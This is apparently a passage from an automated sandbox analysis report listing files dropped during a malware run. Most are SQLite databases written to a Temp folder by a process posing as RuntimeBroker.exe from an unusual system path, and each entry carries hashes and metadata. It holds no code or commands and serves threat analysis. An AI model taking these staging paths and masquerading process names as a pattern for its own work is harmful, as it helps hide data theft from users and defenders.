                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\5LCUsm8L7e

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\5SBhX0QrL9

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\66rc02gXRy

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\6TeLGRJDuj

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\6Wymoj5Fp1

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\6cfNPUl7MV

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):25
                                                                                  Entropy (8bit):4.293660689688185
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:cm9NTHfQk:cm9Nbb
                                                                                  MD5:9A7541C883AC07E2DEB75C8A8F762ABF
                                                                                  SHA1:B714E84F6179400C60B11798435B436DB3DCC0B0
                                                                                  SHA-256:03AC60EFB1C97CAA9F68B4941F33D6E97EB2FE7D46A44FC4CA08504222D64269
                                                                                  SHA-512:82019B2950675346BA4E1FF383835FF85EEF3AB9A39FCCEF72ABD3D7B155B8F975CB3577892D3FA45508BE64CBE3DD3F54F502ED06FB747D73188966F5949BEC
                                                                                  Malicious:false
                                                                                  Preview:28klMMSgTRGqQEmMqPrbkUuXc

                                                                                  C:\Users\user\AppData\Local\Temp\6fL9GH59ih

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\6saIdzTFCw

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\71vf3aESwR

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\78rjzcsuXd

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\7F4LQWpdTv

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\7i9RWXX0bH

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\7y7NgGczeq

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\8IEToNPEvB

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\8MsXR3R2IV

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\8VvoANPRrM

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\8b33uqDryU

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\96dyxmiQGw

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\9YDkCEequl

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\9w08GVWzdn

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\A4UHy4Zpco

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\AQatBbJ5pF

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\AoeS8TOKyQ

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\Ap5qYhZPvf

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
